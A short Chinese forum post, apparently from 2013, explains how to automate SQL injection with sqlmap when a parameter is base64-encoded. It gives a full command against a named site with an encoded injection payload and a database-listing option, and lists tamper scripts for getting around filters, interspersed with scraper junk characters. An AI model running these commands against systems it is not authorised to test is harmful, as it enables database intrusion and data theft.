WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
# G" ^9 S: h, K) K7 u4 a8 l( ~( X) U+ k: Z; n: q' [
sqlmap的tamper里有个base64encode.py
9 X2 T2 m6 S$ u
" l+ `: g' K( O4 W使用如下$ g# ~9 j2 X# F: b9 h: X i S
8 }8 ] T6 i. b2 n+ U& f7 B
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
+ w# _- d- ?, S0 `4 [! ^ Y/ \& i2 u
, k5 l8 x; O/ C) x
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
; d% f7 ^' ?; w# f" L0 C% X% j2 t( d" K4 Z/ E& I1 ^+ n
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:: Q; E, U0 ]) Y: ?
/ j2 L2 }0 m6 k/ k/ B. H& q
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
: ~3 U# L7 s. Wspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入5 M7 `6 X- T0 J" u
首先确定目标数据库版本,然后选择相应的脚本。; t- m, V- M/ {+ j& L4 g
-v 3 --batch --tamper "space2hash.py"
' J1 O7 o, _/ x0 ^' G
2 f; W! M/ S6 |( ^) t& u还有其他一些插件: {2 P2 C4 ]8 K: c4 F% n# A
encodes编码 ——charencode.py3 K. y2 H* j* ~4 Q0 i
base64编码 —— base64encode.py
6 K. C$ E6 K: L2 f! U替换空格和关键字 —— halfversionedmorekeywords.py
, F, E) h4 E! ]8 z( h- S6 P1 C; ` |
8 u8 T4 B! A7 n1 {6 z1 O
1 a, F9 c, S# N2 Z6 V) p
% [( m& p( v- ?
/ E4 G5 J' l' ^$ r E% [# g# y( P |
发表于 2013-11-23 15:50:45
收藏
支持
反对